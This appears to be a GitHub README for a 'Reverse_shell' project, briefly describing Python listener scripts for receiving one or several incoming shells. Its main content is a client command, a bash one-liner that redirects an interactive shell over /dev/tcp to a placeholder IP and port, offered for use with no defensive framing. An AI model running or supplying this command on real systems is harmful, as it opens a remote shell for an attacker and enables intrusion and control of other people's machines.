Skip to content

Latest commit

 

History

History
14 lines (8 loc) · 317 Bytes

README.md

File metadata and controls

14 lines (8 loc) · 317 Bytes

Reverse_shell

Reverse shell with python

  • reverse_server.py For a single shell bounce
  • reverse_servers.py Support multiple shell bounce

Client command

bash -c "bash -i &>/dev/tcp/<IP>/<Port> 0>&1"

Screenshot

Reverse_shell.gif